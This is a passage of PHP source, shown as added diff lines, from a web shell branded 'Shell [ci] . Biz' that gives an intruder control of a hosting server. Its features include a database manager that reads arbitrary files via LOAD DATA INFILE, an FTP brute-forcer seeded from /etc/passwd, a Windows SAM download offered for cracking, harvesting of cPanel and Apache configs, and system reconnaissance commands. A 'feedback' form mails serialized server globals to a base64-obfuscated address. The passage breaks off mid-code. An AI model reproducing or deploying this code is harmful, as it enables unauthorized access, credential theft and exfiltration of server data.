echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; + echo "<td>".$row["Rows"]."</td>"; + echo "<td>".$row["Type"]."</td>"; + echo "<td>".$row["Create_time"]."</td>"; + echo "<td>".$row["Update_time"]."</td>"; + echo "<td>".$size."</td>"; + echo "<td>&nbsp;<a 
href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; + echo "</tr>"; + $i++; + } + echo "<tr bgcolor=\"000000\">"; + echo "<td><center><b>»</b></center></td>"; + echo "<td><center><b>".$i." table(s)</b></center></td>"; + echo "<td><b>".$trows."</b></td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td><b>".view_size($tsize)."</b></td>"; + echo "<td></td>"; + echo "</tr>"; + echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"tbldrop\">Drop</option>"; + echo "<option value=\"tblempty\">Empty</option>"; + echo "<option value=\"tbldump\">Dump</option>"; + echo "<option value=\"tblcheck\">Check table</option>"; + echo "<option value=\"tbloptimize\">Optimize table</option>"; + echo "<option value=\"tblrepair\">Repair table</option>"; + echo "<option value=\"tblanalyze\">Analyze table</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" 
name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } + if (!empty($sql_act)) + { + echo "<hr size=\"1\" noshade>"; + if ($sql_act == "newdb") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "<center><b>Server-status variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#000000 borderColorLight=#000000 
border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table></center>"; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "<center><b>Server variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#000000 borderColorLight=#000000 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "<center><b>Processes:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#000000 borderColorLight=#000000 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + 
mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} + else + { + for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} + $f = ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} + if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} + else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "</td></tr></table>"; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; + } + echo "</table>"; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} + elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} + echo "<br><br>"; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "<b>Ftp Quick brute:</b><br>"; + if (!win) {echo "This functions not work in Windows!<br><br>";} + else + { + function k1r4ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." 
with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called Shell [ci] . Biz ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (k1r4ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. 
connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"Shell [ci] . Biz ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."k1r4_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} + else + { + echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d)); + $gr = 
posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); k1r4exit();} +if ($act == "security") +{ + echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "<b>*nix /etc/passwd:</b><br>"; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; + echo join(":",$uid)."<br>"; + } + $i++; + } + } + else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} + else {echo "<b><font color=green>You can crack winnt passwords. 
<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";} + } + if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} + if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." 
- </b>";} echo $name.nl2br($value)."<br>";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = 
text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; + } + echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> + <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> + <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; + echo "<center>base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} + else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" 
readonly>".$debase64."</textarea>";}
+ echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
+ }
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+ $hex = dechex(ord($encoder_input[$i]));
+ if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+ elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></center></form>";
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
+}
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+ if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using Shell [ci] . Biz".$shver."!"; k1r4exit(); }
+ else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+ if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+ $rnd = rand(0,9).rand(0,9).rand(0,9);
+ echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." 
<br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "update") {$ret = k1r4_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}
+if ($act == "feedback")
+{
+ $suppmail = base64_decode("ZnJlZXNoZWxsNTEwQGdtYWlsLmNvbQ==");
+ if (!empty($submit))
+ {
+ $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+ $body = "Shell [ci] . Biz".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
+ if (!empty($fdbk_ref))
+ {
+ $tmp = @ob_get_contents();
+ ob_clean();
+ phpinfo();
+ $phpinfo = base64_encode(ob_get_contents());
+ ob_clean();
+ echo $tmp;
+ $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+ }
+ mail($suppmail,"Shell [ci] . Biz".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
+ echo "<center><b>Thanks for your feedback! 
Your ticket ID: ".$ticket.".</b></center>"; + } + else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} +} +if ($act == "search") +{ + echo "<b>Search in file-system:</b><br>"; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {k1r4fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "<form method=POST> +<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act 
value=\"".$dspact."\"> +<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp +<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> +<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text +<br><br><input type=submit name=submit value=\"Search\"></form>"; + if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." 
objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+ $form = TRUE;
+ if ($chmod_submit)
+ {
+ $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+ if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+ else {$err = "Can't chmod to ".$octet.".";}
+ }
+ if ($form)
+ {
+ $perms = parse_perms($mode);
+ echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" 
checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = 